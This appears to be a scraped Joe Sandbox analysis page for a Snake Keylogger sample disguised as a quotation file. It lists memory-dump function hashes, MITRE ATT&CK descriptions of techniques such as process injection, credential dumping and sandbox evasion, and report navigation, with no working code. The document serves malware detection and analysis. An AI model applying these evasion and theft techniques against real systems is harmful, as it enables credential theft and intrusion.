Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de07219da6feac4dee2e3b5447de770e3091cea692ca2b961694adad516767a6
Instruction ID: 91db1db7ec4cc7980bf87d178cd4c26a31414985836a65dada734a57c8a6e46b
Opcode Fuzzy Hash: de07219da6feac4dee2e3b5447de770e3091cea692ca2b961694adad516767a6
Instruction Fuzzy Hash: 6031E372D0C98A5FF785FB28A8911FCBBA1FF457A0F920176C048D7293CD6CA9468720

Function 00007FF7C1106091 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ab0d679cee475bb722c27d9d8e51863956a80c56ef5d6d81739f0fc9f90e602
Instruction ID: 552cb7df5d9e4a8fd44bf62704606f26225e25b15ee0add0ba6af38d4763796f
Opcode Fuzzy Hash: 5ab0d679cee475bb722c27d9d8e51863956a80c56ef5d6d81739f0fc9f90e602
Instruction Fuzzy Hash: 3A31E170E08A8A8FE746EB2888617EDBBA1FF59350F8442B6C008D72C6DE386945C751

Function 00007FF7C1100740 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e66f4604ee13f11572c22c2e20f6de08c1abf74a807caa893dce50583dea6584
Instruction ID: 6d1401c29754676f65403fc6d41bd0b52757e68f1f928186e33765b3509f027e
Opcode Fuzzy Hash: e66f4604ee13f11572c22c2e20f6de08c1abf74a807caa893dce50583dea6584
Instruction Fuzzy Hash: E731E471D0C98E9FE785FB28A8905ECBBA1FF45790FD20076D048D7293CD6CA9468720

Function 00007FF7C1100748 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e1d67f2e5ba1369d1ee53913b8bcb2f2c78f0b0f4efb396deb7ea5f63088e8c
Instruction ID: cf822d98f844cd77776c21d1cbcf7e6170dddcf95277936f2d6dba99f5ed2231
Opcode Fuzzy Hash: 4e1d67f2e5ba1369d1ee53913b8bcb2f2c78f0b0f4efb396deb7ea5f63088e8c
Instruction Fuzzy Hash: 8131C171D0C98A9FE785EB28A8A05ECBBA1FF49790F920075D048D7293CE6CA945C720

Function 00007FF7C1108412 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edc96a0e7e81ecf1d3be005cba6626a50427dbb0e94808e6dd8ad5aa504e96ed
Instruction ID: 61b497d6d4447d569238e150c8a3385c960d5193901a6de5e381cc07a120b3eb
Opcode Fuzzy Hash: edc96a0e7e81ecf1d3be005cba6626a50427dbb0e94808e6dd8ad5aa504e96ed
Instruction Fuzzy Hash: 3731C230C4D6898FD7469F64C8647E9BBB1EF8A320F4540EAD049D7192CA3D5A56CB21

Function 00007FF7C1101DA9 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 411a19bbaec6b57bc9646d63cf8bd65eb6568f2c5e7fb2fe3cc1890c836c58ee
Instruction ID: 12776f503a458df671fd73dfb560746aefe324aa47c43b71de03174f12236710
Opcode Fuzzy Hash: 411a19bbaec6b57bc9646d63cf8bd65eb6568f2c5e7fb2fe3cc1890c836c58ee
Instruction Fuzzy Hash: 6E213970D18A4C8FDB81EF68C8596EDBBF1FF69310F4401A6D408E3291DB38A9808B01

Function 00007FF7C110EE76 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 466481fb122dbc253692dce6f023b39c9d5264ccbc8af86732115be6632b96a0
Instruction ID: 185d947860716424f0a1cf4f72713c49c603dd612f576b5a6d6fc18f08f8f933
Opcode Fuzzy Hash: 466481fb122dbc253692dce6f023b39c9d5264ccbc8af86732115be6632b96a0
Instruction Fuzzy Hash: 65214A31E0960A8BEB08EF95E4516FDF7A2FF54311FA04579E01D972C6CE78A840CB61

Function 00007FF7C110ABB4 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b45dff1d2c242ac9abdbd2046c4b028080d4183515331766469400e42666e60
Instruction ID: 703bd41b204193b25b00b1bb5b20975c5c2907a14ac746ae262ba80e836d8012
Opcode Fuzzy Hash: 2b45dff1d2c242ac9abdbd2046c4b028080d4183515331766469400e42666e60
Instruction Fuzzy Hash: B121F430C18A1E8FEB55EF54D844BEEB7F2BF44314F5041B9D019A2285CB786A86CF90

Function 00007FF7C110AB8A Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8506d59bac240843fa237fd95878877392885f36c6c33acf7a64f10f9a8a8a1a
Instruction ID: 68cae03327038d308c57b059b4d0a6df77ca9ae62553827a5522df747db826d5
Opcode Fuzzy Hash: 8506d59bac240843fa237fd95878877392885f36c6c33acf7a64f10f9a8a8a1a
Instruction Fuzzy Hash: 33010C70C1864A8FEB95DF58E854AE9B7B1FF44710F5002BAD41993291CB786A46CF50

Function 00007FF7C1105971 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9948fbf04bb9428f6d24d9b8d92935c1233c0d6e431aa9e645ff44857876a70a
Instruction ID: c477a9042ab54d9ee14adc14b519febb6e1f1897b959e89b151158d497e4e84c
Opcode Fuzzy Hash: 9948fbf04bb9428f6d24d9b8d92935c1233c0d6e431aa9e645ff44857876a70a
Instruction Fuzzy Hash: EAF0E270C4964C8FE741AF2098092F9BFB0AF1A320F8104B3E408C60A2EB789454C722

Function 00007FF7C110AB98 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54fa2438536e34a0b54791d1362e6f624f0000e7ef40c374bb26389f3830d48c
Instruction ID: 2a10c7a46c13e505bc2ee4f40eba1b7efe7100611fba38cc654af20845d7f116
Opcode Fuzzy Hash: 54fa2438536e34a0b54791d1362e6f624f0000e7ef40c374bb26389f3830d48c
Instruction Fuzzy Hash: E3014C30D1860E8BEB99EF48D841BEDB7F1FF44714FA00179D41993291CB786A46CB50

Function 00007FF7C110ABA1 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 176f1c233bfedb7340792ae6b318eefd26e9f1949d63d818e7526618d5b5dfd3
Instruction ID: aab9ca8bd4f304b8a43b50e926cc2a57cfb07ac27c28037f96bc26184074c467
Opcode Fuzzy Hash: 176f1c233bfedb7340792ae6b318eefd26e9f1949d63d818e7526618d5b5dfd3
Instruction Fuzzy Hash: 57011A70C146198FEB99DF08D945A9DB7F5FF44714F5001BAD40993290DB786A86CB40

Function 00007FF7C110ABAB Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6250fef4e0c848ebecfaae0b29f0fce2d54184098706584109acae329d0c5bd
Instruction ID: 7a4d8ec2f32031daf2ff5bf5caf5270d3ba30441a2be7ce9d3890f08b20c464c
Opcode Fuzzy Hash: b6250fef4e0c848ebecfaae0b29f0fce2d54184098706584109acae329d0c5bd
Instruction Fuzzy Hash: A8F03C30C1860A8BEB99EF04D841BE9B7F1FF04710F600279D41993290CB786946CB50

Function 00007FF7C110D50E Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b823ee7be7b71927f32778871d8020967b8dc227b5df374e1d5e4a7c1155a6f7
Instruction ID: cf347f43a6331a34c8e63f7fc37f771b609a5f65298d4449ddbd4dbe1091c025
Opcode Fuzzy Hash: b823ee7be7b71927f32778871d8020967b8dc227b5df374e1d5e4a7c1155a6f7
Instruction Fuzzy Hash: EFE0C071C0462A8FEB59EA14D855AE8B370AB50710F5042FAD41E96191DE352A898E60

Non-executed Functions

Function 00007FF7C11093B6 Relevance: .4, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0383af7f3be1b447bc69372d2f29c723f4fb88812daeb640dd00a1a9b3898f73
Instruction ID: b79de4b7b9519ad7a7b31214bd2eaaeb1b7ef61116ae2993034132ddead8ad70
Opcode Fuzzy Hash: 0383af7f3be1b447bc69372d2f29c723f4fb88812daeb640dd00a1a9b3898f73
Instruction Fuzzy Hash: 4BF12A70D08A5D8FDB95EF68C894BADB7F1FF59300F5041AAD00DE7292DA78A985CB10

Function 00007FF7C11084FC Relevance: .4, Instructions: 368COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2538891249.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7c1100000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e8c2aa63b4f9b2582b3024d2472d37fe531f7b7292eb9c982b3dccc379e5648
Instruction ID: 09cc38a3ebecc1156266126849a79d64e002976c7f19569004718d8ea1ca9fab
Opcode Fuzzy Hash: 4e8c2aa63b4f9b2582b3024d2472d37fe531f7b7292eb9c982b3dccc379e5648
Instruction Fuzzy Hash: D9D1F870D18A1D8FDB95EF68C894BADB7B1FF59340F6041A9D00DE7292DA78A981CB10

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report QUOTATION_NOVQTRA071244PDF.scr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
QUOTATION_NOVQTRA071244PDF.scr.exe